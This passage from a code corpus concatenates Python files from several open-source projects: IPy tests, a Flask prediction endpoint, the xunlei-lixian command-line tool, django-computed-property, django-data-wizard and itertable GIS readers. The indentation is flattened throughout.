ip2 = IPy.IP('0:0:1000::')
self.assertEqual(IPy.IP(ip.int() + ip2.int()).strCompressed(), 'ff00:1::')
ip = IPy.IP('::e000:0/112')
ip2 = IPy.IP('::e001:0/112')
self.assertEqual(ip.__add__(ip2).prefixlen(),111)
self.assertEqual(ip.__add__(ip2).version(),6)
ip2 = IPy.IP('::dfff:ffff')
#$T->ok_eqnum ($ip->bincomp('gt',$ip2),1,$ip->error());
#ip = IPy.IP('::e000:0 - fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b')
#$T->ok_eq (($ip->find_prefixes())[2],'0000:0000:0000:0000:0000:0000:e002:0040/127',$ip->error());
ip = IPy.IP('ffff::/16')
ip2 = IPy.IP('8000::/16')
#$T->ok_eqnum ($ip->overlaps($ip2),$IP_NO_OVERLAP,$ip->error());
def timeout(func, args=(), kwargs={}, timeout_duration=1, default=None):
"""
ASPN receipe written by <NAME> to call a function with
a timeout using threads:
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/473878
Small patch: add setDaemon(True) to allow Python to leave whereas the
thread is not done.
"""
class InterruptableThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.result = None
def run(self):
try:
self.result = func(*args, **kwargs)
except:
self.result = default
it = InterruptableThread()
it.setDaemon(True)
it.start()
it.join(timeout_duration)
if it.isAlive():
return default
else:
return it.result
class IPSetChecks(unittest.TestCase):
def setUp(self):
#array
self.a = [IPy.IP("192.168." + str(i) + ".0/24") for i in range(256)]
#range
self.r = IPy.IP('192.168.0.0/16')
#testing set
self.t = IPy.IPSet(self.a)
#control set
self.c = IPy.IPSet(self.a)
#Could otherwise look like 192.168.128.0/17
self.sixRange = IPy.IP('::c0a8:8000/113')
def testVersionSeparation(self):
#Don't remove a matching IPv6 subnet from an IPv4 list
self.assertRaises(KeyError, self.t.remove, self.sixRange)
self.t.add(self.sixRange)
self.assertNotEqual(self.t, self.c)
self.t.remove(self.sixRange)
self.t.discard(self.sixRange)
self.assertEqual(self.t, self.c)
def testContains(self):
self.assertTrue(IPy.IP('192.168.15.32/28') in self.t)
self.assertFalse(IPy.IP('172.16.31.10/28') in self.t)
class RegressionTest(unittest.TestCase):
def testNulNetmask(self):
ip = timeout(IPy.IP, ["0.0.0.0/0.0.0.0"], timeout_duration=0.250, default=None)
if ip:
text = str(ip)
else:
text = "*TIMEOUT*"
self.assertEqual(text, "0.0.0.0/0")
def testNonZeroType(self):
self.assertEqual(bool(IPy.IP("0.0.0.0/0")), True)
def testPrivate169(self):
"""
RFC 3330 indicates that 169.254.0.0/16 addresses are private.
They are automatically configured for links in the absence of other
information and should not be used on the internet
"""
self.assertEqual(IPy.IP("169.254.191.164").iptype(), "PRIVATE")
def testCheckAddrPrefixlenOn(self):
self.assertEqual(len(IPy.IP('192.168.0.0/24')), 256)
self.assertRaises(ValueError, IPy.IP, '192.168.1.0/42')
self.assertRaises(ValueError, IPy.IP, '172.30.1.0/22')
def testCheckAddrPrefixlenOff(self):
self.assertEqual(len(IPy.IP('192.168.0.0/24')), 256)
self.assertRaises(ValueError, IPy.IP, '192.168.1.0/42')
class TestConstrutor(unittest.TestCase):
def testCheckAddrPrefixlenOff(self):
self.assertRaises(ValueError, IPy.IP, 0xffffffff + 1, ipversion=4)
self.assertRaises(ValueError, IPy.IP, 0xffffffffffffffffffffffffffffffff + 1, ipversion=6)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "1pyroaqua/docker-beginner",
"score": 3
} |
#### File: serve/code/serve.py
```python
import os
from flask import Flask
from flask import request
import pandas as pd
from sklearn import linear_model
import pickle
app = Flask(__name__)
@app.route('/ping')
def index():
return "true"
@app.route('/invocation', methods=['GET'])
def get_prediction():
feature1 = float(request.args.get('f1'))
feature2 = float(request.args.get('f2'))
feature3 = float(request.args.get('f3'))
loaded_model = pickle.load(open('model/model.pkl', 'rb'))
prediction = loaded_model.predict([[feature1, feature2, feature3]])
return str(prediction)
if __name__ == '__main__':
app.run(port=5000,host='0.0.0.0')
``` |
{
"source": "1py/xunlei-lixian",
"score": 3
} |
#### File: 1py/xunlei-lixian/lixian_cli_parser.py
```python
__all__ = ['expand_command_line', 'parse_command_line', 'Parser', 'command_line_parse', 'command_line_option', 'command_line_value', 'command_line_parser', 'with_parser']
def expand_windows_command_line(args):
from glob import glob
expanded = []
for x in args:
try:
xx = glob(x)
except:
xx = None
if xx:
expanded += xx
else:
expanded.append(x)
return expanded
def expand_command_line(args):
import platform
return expand_windows_command_line(args) if platform.system() == 'Windows' else args
def parse_command_line(args, keys=[], bools=[], alias={}, default={}, help=None):
args = expand_command_line(args)
options = {}
for k in keys:
options[k] = None
for k in bools:
options[k] = None
left = []
args = args[:]
while args:
x = args.pop(0)
if x == '--':
left.extend(args)
break
if x.startswith('-') and len(x) > 1:
k = x.lstrip('-')
if k in bools:
options[k] = True
elif k.startswith('no-') and k[3:] in bools:
options[k[3:]] = False
elif k in keys:
options[k] = args.pop(0)
elif '=' in k and k[:k.index('=')] in keys:
options[k[:k.index('=')]] = k[k.index('=')+1:]
elif k in alias:
k = alias[k]
if k in bools:
options[k] = True
else:
options[k] = args.pop(0)
elif '=' in k and k[:k.index('=')] in alias:
k, v = k[:k.index('=')], k[k.index('=')+1:]
k = alias[k]
if k not in keys:
raise RuntimeError('Invalid boolean option '+x)
options[k] = v
else:
if help:
print 'Unknown option ' + x
print
print help
exit(1)
else:
raise RuntimeError('Unknown option '+x)
else:
left.append(x)
for k in default:
if options[k] is None:
options[k] = default[k]
class Args(object):
def __init__(self, args, left):
self.__dict__['_args'] = args
self.__dict__['_left'] = left
def __getattr__(self, k):
v = self._args.get(k, None)
if v:
return v
if '_' in k:
return self._args.get(k.replace('_', '-'), None)
def __setattr__(self, k, v):
self._args[k] = v
def __getitem__(self, i):
if type(i) == int:
return self._left[i]
else:
return self._args[i]
def __setitem__(self, i, v):
if type(i) == int:
self._left[i] = v
else:
self._args[i] = v
def __len__(self):
return len(self._left)
def __str__(self):
return '<Args%s%s>' % (self._args, self._left)
return Args(options, left)
class Stack:
def __init__(self, **args):
self.__dict__.update(args)
class Parser:
def __init__(self):
self.stack = []
def with_parser(self, parser):
self.stack.append(parser)
return self
def __call__(self, args, keys=[], bools=[], alias={}, default={}, help=None):
stack = Stack(keys=list(keys), bools=list(bools), alias=dict(alias), default=dict(default))
keys = []
bools = []
alias = {}
default = {}
for stack in [x.args_stack for x in self.stack] + [stack]:
keys += stack.keys
bools += stack.bools
alias.update(stack.alias)
default.update(stack.default)
args = parse_command_line(args, keys=keys, bools=bools, alias=alias, default=default, help=help)
for fn in self.stack:
new_args = fn(args)
if new_args:
args = new_args
return args
def command_line_parse(keys=[], bools=[], alias={}, default={}):
def wrapper(fn):
if hasattr(fn, 'args_stack'):
stack = fn.args_stack
stack.keys += keys
stack.bools += bools
stack.alias.update(alias)
stack.default.update(default)
else:
fn.args_stack = Stack(keys=list(keys), bools=list(bools), alias=dict(alias), default=dict(default))
return fn
return wrapper
def command_line_option(name, alias=None, default=None):
alias = {alias:name} if alias else {}
default = {name:default} if default is not None else {}
return command_line_parse(bools=[name], alias=alias, default=default)
def command_line_value(name, alias=None, default=None):
alias = {alias:name} if alias else {}
default = {name:default} if default else {}
return command_line_parse(keys=[name], alias=alias, default=default)
def command_line_parser(*args, **kwargs):
def wrapper(f):
parser = Parser()
for x in reversed(getattr(f, 'args_parsers', [])):
parser = parser.with_parser(x)
if hasattr(f, 'args_stack'):
def parse_no_body(args):
pass
parse_no_body.args_stack = f.args_stack
parser = parser.with_parser(parse_no_body)
import functools
@functools.wraps(f)
def parse(args_list):
return f(parser(args_list, *args, **kwargs))
return parse
return wrapper
def with_parser(parser):
def wrapper(f):
if hasattr(f, 'args_parsers'):
f.args_parsers.append(parser)
else:
f.args_parsers = [parser]
return f
return wrapper
```
#### File: 1py/xunlei-lixian/lixian_colors_win32.py
```python
__all__ = ['WinConsole']
from lixian_colors_console import Console
import ctypes
from ctypes import windll, byref, Structure
from ctypes.wintypes import SHORT, WORD
import sys
INVALID_HANDLE_VALUE = -1
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
class COORD(Structure):
_fields_ = (('X', SHORT),
('Y', SHORT),)
class SMALL_RECT(Structure):
_fields_ = (('Left', SHORT),
('Top', SHORT),
('Right', SHORT),
('Bottom', SHORT),)
class CONSOLE_SCREEN_BUFFER_INFO(Structure):
_fields_ = (('dwSize', COORD),
('dwCursorPosition', COORD),
('wAttributes', WORD),
('srWindow', SMALL_RECT),
('dwMaximumWindowSize', COORD),)
def GetWinError():
code = ctypes.GetLastError()
message = ctypes.FormatError(code)
return '[Error %s] %s' % (code, message)
def GetStdHandle(handle):
h = windll.kernel32.GetStdHandle(handle)
if h == INVALID_HANDLE_VALUE:
raise OSError(GetWinError())
return h
def GetConsoleScreenBufferInfo(handle):
info = CONSOLE_SCREEN_BUFFER_INFO()
if not windll.kernel32.GetConsoleScreenBufferInfo(handle, byref(info)):
raise OSError(GetWinError())
return info
def SetConsoleTextAttribute(handle, attributes):
if not windll.Kernel32.SetConsoleTextAttribute(handle, attributes):
raise OSError(GetWinError())
FOREGROUND_BLUE = 0x0001
FOREGROUND_GREEN = 0x0002
FOREGROUND_RED = 0x0004
FOREGROUND_INTENSITY = 0x0008
BACKGROUND_BLUE = 0x0010
BACKGROUND_GREEN = 0x0020
BACKGROUND_RED = 0x0040
BACKGROUND_INTENSITY = 0x0080
COMMON_LVB_LEADING_BYTE = 0x0100
COMMON_LVB_TRAILING_BYTE = 0x0200
COMMON_LVB_GRID_HORIZONTAL = 0x0400
COMMON_LVB_GRID_LVERTICAL = 0x0800
COMMON_LVB_GRID_RVERTICAL = 0x1000
COMMON_LVB_REVERSE_VIDEO = 0x4000
COMMON_LVB_UNDERSCORE = 0x8000
colors = {
'black' : 0b000,
'blue' : 0b001,
'green' : 0b010,
'red' : 0b100,
'cyan' : 0b011,
'yellow' : 0b110,
'purple' : 0b101,
'magenta': 0b101,
'white' : 0b111,
}
def mix_styles(styles, attributes):
fg_color = -1
bg_color = -1
fg_bright = -1
bg_bright = -1
reverse = -1
underscore = -1
for style in styles:
if style == 0:
# reset mode
raise NotImplementedError()
elif style == 1:
# foreground bright on
fg_bright = 1
elif style == 2:
# both bright off
fg_bright = 0
bg_bright = 0
elif style == 4 or style == 'underline':
# Underscore
underscore = 1
elif style == 5:
# background bright on
bg_bright = 1
elif style == 7 or style == 'inverse':
# Reverse foreground and background attributes.
reverse = 1
elif style == 21 or style == 22:
# foreground bright off
fg_bright = 0
elif style == 24:
# Underscore: no
underscore = 0
elif style == 25:
# background bright off
bg_bright = 0
elif style == 27:
# Reverse: no
reverse = 0
elif 30 <= style <= 37:
# set foreground color
fg_color = style - 30
elif style == 39:
# default text color
fg_color = 7
fg_bright = 0
elif 40 <= style <= 47:
# set background color
bg_color = style - 40
elif style == 49:
# default background color
bg_color = 0
elif 90 <= style <= 97:
# set bold foreground color
fg_bright = 1
fg_color = style - 90
elif 100 <= style <= 107:
# set bold background color
bg_bright = 1
bg_color = style - 100
elif style == 'bold':
fg_bright = 1
elif style in colors:
fg_color = colors[style]
if fg_color != -1:
attributes &= ~ 0b111
attributes |= fg_color
if fg_bright != -1:
attributes &= ~ 0b1000
attributes |= fg_bright << 3
if bg_color != -1:
attributes &= ~ 0b1110000
attributes |= bg_color << 4
if bg_bright != -1:
attributes &= ~ 0b10000000
attributes |= bg_bright << 7
if reverse != -1:
attributes &= ~ COMMON_LVB_REVERSE_VIDEO
attributes |= reverse << 14
# XXX: COMMON_LVB_REVERSE_VIDEO doesn't work...
if reverse:
attributes = (attributes & ~(0b11111111 | COMMON_LVB_REVERSE_VIDEO)) | ((attributes & 0b11110000) >> 4) | ((attributes & 0b1111) << 4)
if underscore != -1:
attributes &= ~ COMMON_LVB_UNDERSCORE
attributes |= underscore << 15
return attributes
class Render:
def __init__(self, handle, default, attributes):
self.handle = handle
self.default = default
self.attributes = attributes
def __enter__(self):
SetConsoleTextAttribute(self.handle, self.attributes)
def __exit__(self, type, value, traceback):
SetConsoleTextAttribute(self.handle, self.default)
class WinConsole(Console):
def __init__(self, output=None, styles=[], handle=STD_OUTPUT_HANDLE):
Console.__init__(self, output, styles)
self.handle = GetStdHandle(handle)
self.default = GetConsoleScreenBufferInfo(self.handle).wAttributes
def write(self, s):
if self.styles:
with self.render(mix_styles(self.styles, self.default)):
self.output.write(s)
self.output.flush()
else:
self.output.write(s)
self.output.flush()
def render(self, attributes):
return Render(self.handle, self.default, attributes)
```
#### File: xunlei-lixian/lixian_commands/util.py
```python
__all__ = ['parse_login', 'parse_colors', 'parse_logging', 'parse_size', 'create_client', 'output_tasks', 'usage']
from lixian_cli_parser import *
from lixian_config import get_config
from lixian_config import LIXIAN_DEFAULT_COOKIES
from lixian_encoding import default_encoding, to_native
from lixian_colors import colors
from getpass import getpass
import lixian_help
@command_line_value('username', default=get_config('username'))
@command_line_value('password', default=get_config('password'))
@command_line_value('cookies', default=LIXIAN_DEFAULT_COOKIES)
def parse_login(args):
if args.password == '-':
args.password = getpass('Password: ')
if args.cookies == '-':
args._args['cookies'] = None
return args
@command_line_option('colors', default=get_config('colors', True))
def parse_colors(args):
pass
@command_line_value('log-level', default=get_config('log-level'))
@command_line_value('log-path', default=get_config('log-path'))
@command_line_option('debug')
@command_line_option('trace')
def parse_logging(args):
path = args.log_path
level = args.log_level
if args.trace:
level = 'trace'
elif args.debug:
level = 'debug'
if path or level:
import lixian_logging
level = level or 'info'
lixian_logging.init_logger(use_colors=args.colors, level=level, path=path)
logger = lixian_logging.get_logger()
import lixian
# inject logger to lixian (this makes lixian.py zero-dependency)
lixian.logger = logger
@command_line_option('size', default=get_config('size'))
@command_line_option('format-size', default=get_config('format-size'))
def parse_size(args):
pass
def create_client(args):
from lixian import XunleiClient
return XunleiClient(args.username, args.password, args.cookies)
def output_tasks(tasks, columns, args, top=True):
for i, t in enumerate(tasks):
status_colors = {
'waiting': 'yellow',
'downloading': 'magenta',
'completed':'green',
'pending':'cyan',
'failed':'red',
}
c = status_colors[t['status_text']]
with colors(args.colors).ansi(c)():
for k in columns:
if k == 'n':
if top:
print '#%d' % t['#'],
elif k == 'id':
print t.get('index', t['id']),
elif k == 'name':
print t['name'].encode(default_encoding),
elif k == 'status':
with colors(args.colors).bold():
print t['status_text'],
elif k == 'size':
if args.format_size:
from lixian_util import format_size
print format_size(t['size']),
else:
print t['size'],
elif k == 'progress':
print t['progress'],
elif k == 'speed':
print t['speed'],
elif k == 'date':
print t['date'],
elif k == 'dcid':
print t['dcid'],
elif k == 'gcid':
print t['gcid'],
elif k == 'original-url':
print t['original_url'],
elif k == 'download-url':
print t['xunlei_url'],
else:
raise NotImplementedError(k)
print
def usage(doc=lixian_help.usage, message=None):
if hasattr(doc, '__call__'):
doc = doc()
if message:
print to_native(message)
print to_native(doc).strip()
```
#### File: 1py/xunlei-lixian/lixian_logging.py
```python
__all__ = ['init_logger', 'get_logger']
import logging
INFO = logging.INFO
DEBUG = logging.DEBUG
TRACE = 1
def file_logger(path, level):
import os.path
path = os.path.expanduser(path)
logger = logging.getLogger('lixian')
logger.setLevel(min(level, DEBUG)) # if file log is enabled, always log debug message
handler = logging.FileHandler(filename=path, )
handler.setFormatter(logging.Formatter('%(asctime)s %(message)s'))
logger.addHandler(handler)
return logger
class ConsoleLogger:
def __init__(self, level=INFO):
self.level = level
def stdout(self, message):
print message
def info(self, message):
if self.level <= INFO:
print message
def debug(self, message):
if self.level <= DEBUG:
print message
def trace(self, message):
pass
class FileLogger:
def __init__(self, path, level=INFO, file_level=None, console_level=None):
console_level = console_level or level
file_level = file_level or level
self.console = ConsoleLogger(console_level)
self.logger = file_logger(path, file_level)
def stdout(self, message):
self.console.stdout(message)
def info(self, message):
self.console.info(message)
self.logger.info(message)
def debug(self, message):
self.console.debug(message)
self.logger.debug(message)
def trace(self, message):
self.logger.log(level=TRACE, msg=message)
default_logger = None
def init_logger(use_colors=True, level=INFO, path=None):
global default_logger
if not default_logger:
if isinstance(level, int):
assert level in (INFO, DEBUG, TRACE)
console_level = level
file_level = level
elif isinstance(level, basestring):
level = level.lower()
if level in ('info', 'debug', 'trace'):
level = {'info': INFO, 'debug': DEBUG, 'trace': TRACE}[level]
console_level = level
file_level = level
else:
console_level = INFO
file_level = DEBUG
for level in level.split(','):
device, level = level.split(':')
if device == 'console':
console_level = {'info': INFO, 'debug': DEBUG, 'trace': TRACE}[level]
elif device == 'file':
file_level = {'info': INFO, 'debug': DEBUG, 'trace': TRACE}[level]
else:
raise NotImplementedError('Invalid logging level: ' + device)
else:
raise NotImplementedError(type(level))
if path:
default_logger = FileLogger(path, console_level=console_level, file_level=file_level)
else:
default_logger = ConsoleLogger(console_level)
def get_logger():
init_logger()
return default_logger
```
#### File: lixian_plugins/commands/extend_links.py
```python
from lixian_plugins.api import command
@command(usage='parse links')
def extend_links(args):
'''
usage: lx extend-links http://kuai.xunlei.com/d/... http://www.verycd.com/topics/...
parse and print links from pages
lx extend-links urls...
lx extend-links --name urls...
'''
from lixian_cli_parser import parse_command_line
from lixian_encoding import default_encoding
args = parse_command_line(args, [], ['name'])
import lixian_plugins.parsers
if args.name:
for x in lixian_plugins.parsers.extend_links_name(args):
print x.encode(default_encoding)
else:
for x in lixian_plugins.parsers.extend_links(args):
print x
```
#### File: lixian_plugins/commands/hash.py
```python
from lixian_plugins.api import command
@command(name='hash', usage='compute hashes')
def print_hash(args):
'''
lx hash --sha1 file...
lx hash --md5 file...
lx hash --md4 file...
lx hash --dcid file...
lx hash --ed2k file...
lx hash --info-hash xxx.torrent...
lx hash --verify-sha1 file hash
lx hash --verify-md5 file hash
lx hash --verify-md4 file hash
lx hash --verify-dcid file hash
lx hash --verify-ed2k file ed2k://...
lx hash --verify-bt file xxx.torrent
'''
#assert len(args) == 1
import lixian_hash
#import lixian_hash_ed2k
#print 'ed2k:', lixian_hash_ed2k.hash_file(args[0])
#print 'dcid:', lixian_hash.dcid_hash_file(args[0])
import lixian_cli_parser
lixian_hash.main(lixian_cli_parser.expand_command_line(args))
```
#### File: lixian_plugins/filters/date.py
```python
from lixian_plugins.api import task_filter
@task_filter(pattern=r'^\d{4}[-.]\d{2}[-.]\d{2}$')
def filter_by_date(keyword, task):
return task['date'] == keyword.replace('-', '.')
```
#### File: lixian_plugins/filters/sort.py
```python
from lixian_plugins.api import task_filter
@task_filter(protocol='sort', batch=True)
def sort_by_name(keyword, tasks):
'''
Example:
lx list sort:
lx download 0/sort:/[0-1]
'''
return sorted(tasks, key=lambda x: x['name'])
``` |
{
"source": "1py/youku-lixian",
"score": 2
} |
#### File: 1py/youku-lixian/qq.py
```python
__all__ = ['qq_download_by_id']
import re
from common import *
def qq_download_by_id(id, title, merge=True):
url = 'http://vsrc.store.qq.com/%s.flv' % id
assert title
download_urls([url], title, 'flv', total_size=None, merge=merge)
``` |
{
"source": "1Q1-Open-Source/django-computed-property",
"score": 2
} |
#### File: django-computed-property/computed_property/fields.py
```python
from __future__ import print_function
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.db.models.signals import pre_save
__all__ = [
'ComputedBooleanField',
'ComputedCharField',
'ComputedDateField',
'ComputedDateTimeField',
'ComputedDecimalField',
'ComputedEmailField',
'ComputedField',
'ComputedFloatField',
'ComputedIntegerField',
'ComputedPositiveIntegerField',
'ComputedPositiveSmallIntegerField',
'ComputedSmallIntegerField',
'ComputedTextField',
'ComputedTimeField',
]
class ComputedField(models.Field):
def __init__(self, compute_from=None, *args, **kwargs):
kwargs['editable'] = False
if compute_from is None:
raise ImproperlyConfigured(
'%s requires setting compute_from' %
self.__class__.__name__
)
super(ComputedField, self).__init__(*args, **kwargs)
self.compute_from = compute_from
class ObjectProxy(object):
def __init__(self, field):
self.field = field
def __get__(self, instance, cls=None):
if instance is None:
return self
value = self.field.calculate_value(instance)
instance.__dict__[self.field.name] = value
return value
def __set__(self, obj, value):
pass
def contribute_to_class(self, cls, name, **kwargs):
"""Add field to class using ObjectProxy so that
calculate_value can access the model instance."""
self.set_attributes_from_name(name)
cls._meta.add_field(self)
self.model = cls
setattr(cls, name, ComputedField.ObjectProxy(self))
pre_save.connect(self.resolve_computed_field, sender=cls)
def resolve_computed_field(self, sender, instance, raw, **kwargs):
"""Pre-save signal receiver to compute new field value."""
setattr(instance, self.get_attname(), self.calculate_value(instance))
return self.calculate_value(instance)
def calculate_value(self, instance):
"""
Retrieve or call function to obtain value for this field.
Args:
instance: Parent model instance to reference
"""
if callable(self.compute_from):
value = self.compute_from(instance)
else:
instance_compute_object = getattr(instance, self.compute_from)
if callable(instance_compute_object):
value = instance_compute_object()
else:
value = instance_compute_object
return self.to_python(value)
def deconstruct(self):
name, path, args, kwargs = super(ComputedField, self).deconstruct()
kwargs['compute_from'] = self.compute_from
return name, path, args, kwargs
def to_python(self, value):
return super(ComputedField, self).to_python(value)
def get_prep_value(self, value):
return super(ComputedField, self).get_prep_value(value)
class ComputedBooleanField(ComputedField, models.BooleanField):
pass
class ComputedCharField(ComputedField, models.CharField):
pass
class ComputedDateField(ComputedField, models.DateField):
pass
class ComputedDateTimeField(ComputedField, models.DateTimeField):
pass
class ComputedDecimalField(ComputedField, models.DecimalField):
pass
class ComputedEmailField(ComputedField, models.EmailField):
pass
class ComputedFloatField(ComputedField, models.FloatField):
pass
class ComputedIntegerField(ComputedField, models.IntegerField):
pass
class ComputedPositiveIntegerField(ComputedField, models.PositiveIntegerField):
pass
class ComputedPositiveSmallIntegerField(ComputedField,
models.PositiveSmallIntegerField):
pass
class ComputedSmallIntegerField(ComputedField, models.SmallIntegerField):
pass
class ComputedTextField(ComputedField, models.TextField):
pass
class ComputedTimeField(ComputedField, models.TimeField):
pass
```
#### File: computed_property/tests/models.py
```python
import datetime
from decimal import Decimal
from django.db import models
import computed_property as fields
def always_true(_): # Needs to consume an arg
return True
class ComputedBool(models.Model):
computed = fields.ComputedBooleanField(compute_from=always_true)
base_value = models.BooleanField(default=False)
class ComputedChar(models.Model):
computed = fields.ComputedCharField(
max_length=25,
compute_from=lambda self: 'char has %s' % self.base_value
)
base_value = models.CharField(
max_length=25,
default='foo'
)
class ComputedDate(models.Model):
computed = fields.ComputedDateField(
compute_from='base_value'
)
base_value = models.DateField()
class ComputedDateFromDateTime(models.Model):
created_at = models.DateTimeField(auto_now_add=True)
computed = fields.ComputedDateField(
compute_from='created_at'
)
class ComputedDateTime(models.Model):
computed = fields.ComputedDateTimeField(
compute_from=lambda self: self.base_value + datetime.timedelta(days=1)
)
base_value = models.DateTimeField()
class ComputedDecimal(models.Model):
computed = fields.ComputedDecimalField(compute_from='convert_to_decimal',
max_digits=3,
decimal_places=2)
base_value = models.IntegerField(default=100)
def convert_to_decimal(self):
return Decimal(self.base_value) / Decimal('100.0')
class ComputedEmail(models.Model):
computed = fields.ComputedEmailField(
compute_from='prepend_test_to_email'
)
base_value = models.EmailField(
max_length=25,
default='<EMAIL>'
)
def prepend_test_to_email(self):
return 'test%s' % self.base_value
class ComputedFloat(models.Model):
computed = fields.ComputedFloatField(compute_from='convert_to_float')
base_value = models.IntegerField(default=100)
def convert_to_float(self):
return float(self.base_value / 100.0)
class AbstractInt(models.Model):
base_value = models.IntegerField(
default=123
)
@property
def compute_val(self):
return self.base_value + 1000
class Meta:
abstract = True
class ComputedInt(AbstractInt):
computed = fields.ComputedIntegerField(
compute_from='compute_val'
)
class ComputedNullable(models.Model):
computed = fields.ComputedIntegerField(
null=True,
compute_from=lambda x: None
)
class ComputedPositiveInt(AbstractInt):
computed = fields.ComputedPositiveIntegerField(compute_from='compute_val')
class ComputedPositiveSmallInt(AbstractInt):
computed = fields.ComputedPositiveSmallIntegerField(
compute_from='compute_val'
)
class ComputedSmallInt(AbstractInt):
computed = fields.ComputedSmallIntegerField(compute_from='compute_val')
class ComputedText(models.Model):
computed = fields.ComputedTextField(
compute_from=lambda x: 'char has %s' % x.base_value
)
base_value = models.CharField(
max_length=25,
default='foo'
)
class ComputedTime(models.Model):
computed = fields.ComputedTimeField(compute_from='base_value')
base_value = models.DateTimeField()
``` |
{
"source": "1Q1-Open-Source/django-data-wizard",
"score": 2
} |
#### File: django-data-wizard/data_wizard/admin.py
```python
from django.contrib import admin
from django.contrib import messages
from django.contrib.contenttypes.models import ContentType
from .models import Run, RunLog, Identifier, Range, Record
from django.urls import reverse
from django.http import HttpResponseRedirect
from django.utils.translation import ugettext_lazy as _
class FixedTabularInline(admin.TabularInline):
can_delete = False
extra = 0
def has_add_permission(self, request, obj):
return False
class RangeInline(admin.TabularInline):
model = Range
fields = [
"identifier",
"type",
"header_col",
"start_col",
"end_col",
"header_row",
"start_row",
"end_row",
"count",
]
extra = 0
class RecordInline(FixedTabularInline):
model = Record
fields = readonly_fields = [
"row",
"success",
"content_type",
"content_object",
"fail_reason",
]
class RunLogInline(FixedTabularInline):
model = RunLog
readonly_fields = ["event", "date"]
@admin.register(Run)
class RunAdmin(admin.ModelAdmin):
list_display = [
"__str__",
"serializer_label",
"record_count",
"last_update",
]
inlines = [RangeInline, RecordInline, RunLogInline]
@admin.register(Identifier)
class IdentifierAdmin(admin.ModelAdmin):
list_display = [
"serializer_label",
"type_label",
"name",
"mapping_label",
"resolved",
]
list_display_links = ["name", "mapping_label"]
list_filter = ["serializer"]
def start_data_wizard(modeladmin, request, queryset):
if queryset.count() != 1:
modeladmin.message_user(
request,
"Select a single row to start data wizard.",
level=messages.ERROR,
)
return
instance = queryset.first()
if isinstance(instance, Run):
run = instance
else:
ct = ContentType.objects.get_for_model(queryset.model)
run = Run.objects.create(
user=request.user,
content_type=ct,
object_id=instance.pk,
)
return HttpResponseRedirect(
reverse("data_wizard:run-serializers", kwargs={"pk": run.pk})
)
start_data_wizard.short_description = _("Import via data wizard")
class ImportActionMixin(object):
"""
Mixin with import functionality implemented as an admin action.
"""
actions = [start_data_wizard]
class ImportActionModelAdmin(ImportActionMixin, admin.ModelAdmin):
pass
``` |
{
"source": "1Q1-Open-Source/itertable",
"score": 3
} |
#### File: itertable/itertable/commands.py
```python
from . import load_file, load_url, flattened, JsonStringIter, CsvStringIter
from .exceptions import IterException
import click
import os
import importlib
@click.command()
@click.argument('source')
@click.argument('source_options', required=False)
@click.option('--format', '-f', default='csv', help='Output format')
def cat(source, source_options, format):
"""
Display contents of a file or IterTable class. SOURCE can be either a
filename or a Python path. SOURCE_OPTIONS is an optional string
specifying init options in "name=value" format, separated by commas.
The data will be printed to the terminal in CSV form, unless the format is
set to JSON.
Examples:
\b
python3 -m itertable example.json # JSON to CSV
python3 -m itertable -f json example.csv # CSV to JSON
python3 -m itertable example.xlsx "start_row=5"
python3 -m itertable http://example.com/example.csv
python3 -m itertable itertable.CsvNetIter "url=http://example.com/example.csv"
""" # noqa
# Parse option string
options = {}
if source_options:
for opt in source_options.split(','):
key, val = opt.split('=')
if val.isdigit():
val = int(val)
options[key] = val
if os.path.exists(source):
try:
input = load_file(source, options=options)
except IterException as e:
raise click.ClickException(str(e))
elif 'http' in source and '://' in source:
try:
input = load_url(source, options=options)
except IterException as e:
raise click.ClickException(str(e))
else:
parts = source.split('.')
class_name = parts[-1]
module_name = ".".join(parts[:-1])
try:
module = importlib.import_module(module_name)
Iter = getattr(module, class_name)
input = flattened(Iter, **options)
except (ImportError, ValueError, AttributeError, IterException) as e:
raise click.ClickException(str(e))
if format == "json":
OutputIter = JsonStringIter
init = "[]"
else:
OutputIter = CsvStringIter
init = ""
output = OutputIter(data=input.data, string=init)
output.data = input.data
output.save()
result = output.string
if output.binary:
result = result.decode('utf-8')
print(result)
```
#### File: itertable/gis/__init__.py
```python
from .mixins import FionaLoaderParser, GisMapper, ShapeMapper, WktMapper
from ..base import BaseIter
class MetaSyncIter(BaseIter):
"""
Custom sync() to handle transfering Fiona metadata (except for driver)
"""
def sync(self, other, save=True):
driver = other.meta.get('driver', None)
other.meta = self.meta.copy()
if driver:
other.meta['driver'] = driver
super(MetaSyncIter, self).sync(other, save)
def get_field_names(self):
if self.field_names is None and self.meta is not None:
return (
['id', 'geometry']
+ list(self.meta['schema']['properties'].keys())
)
return super(MetaSyncIter, self).get_field_names()
class GisIter(FionaLoaderParser, GisMapper, MetaSyncIter):
pass
class ShapeIter(FionaLoaderParser, ShapeMapper, MetaSyncIter):
pass
class WktIter(FionaLoaderParser, WktMapper, MetaSyncIter):
pass
```
#### File: itertable/gis/mixins.py
```python
import fiona
from shapely import wkt, geometry
from ..loaders import FileLoader
from ..parsers.base import BaseParser
from ..mappers import TupleMapper
class FionaLoaderParser(FileLoader, BaseParser):
"""
Composite loader & parser mixin for GIS data, powered by Fiona
"""
layer_id = None
meta = {}
key_field = 'id'
def load(self):
try:
self.layers = fiona.listlayers(self.filename)
except (ValueError, IOError):
driver = guess_driver(self.filename)
self.meta = {'driver': driver}
self.empty_file = True
def parse(self):
# If multiple layers, parse all of them (!)
if len(self.layers) > 1 and self.layer_id is None:
cls = type(self)
self.data = [{
'id': id,
'name': name,
'data': cls(filename=self.filename, layer_id=id)
} for id, name in enumerate(self.layers)]
else:
# One layer, load & parse GIS data
with fiona.open(self.filename, layer=self.layer_id) as f:
self.meta = f.meta
if 'id' in f.meta.get('schema', {}).get('properties', {}):
# TODO: Is this correct?
del f.meta['schema']['properties']['id']
self.data = list(map(self.parse_feature, f))
def parse_feature(self, f):
# Flatten Fiona's GeoJSON-style representation into something more
# amenable to namedtuple-ing
feat = {key: value for key, value in f['properties'].items()}
if 'id' not in feat and 'ID' not in feat:
feat['id'] = f['id']
feat['geometry'] = f['geometry']
return feat
def dump_feature(self, feat, i):
# Undo aforementioned flattening
return {
'id': feat.get('id', feat.get('ID', i)),
'geometry': feat['geometry'],
'properties': {
